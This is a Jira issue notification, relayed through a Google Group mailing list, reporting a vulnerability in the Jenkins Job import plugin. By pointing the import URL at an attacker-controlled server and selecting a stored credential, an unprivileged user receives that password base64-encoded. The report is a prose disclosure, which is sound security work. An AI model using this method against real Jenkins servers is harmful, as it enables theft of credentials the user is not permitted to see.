Title: Message Title
Joshua Ganger updated an issue
Jenkins / JENKINS-56128
Job import plugin allows credential dumping
Change By:
Joshua Ganger
Logged into Jenkins with a valid user, no unrestricted credentials assigned/scoped to my user. No permission to view or add credentials assigned to my user. Job import plugin has several users available, appearing in the dropdown as "username/***". If I enter a query URL for an http server that I control and select one of these credentials, the password is transmitted in base64 encoding in the HTTP get request. This essentially allows me to dump any of these stored credentials despite not being allowed to access them through the credentials page. It's possible that I misunderstand this functionality or that we have a misconfiguration, but this seems abuseable.
Add Comment
This message was sent by Atlassian Jira (v7.11.2#711002-sha1:fdc329d)
--
You received this message because you are subscribed to the Google Groups "Jenkins Issues" group.
To unsubscribe from this group and stop receiving emails from it, send an email to jenkinsci-issues+unsubscr...@googlegroups.com.
For more options, visit https://groups.google.com/d/optout.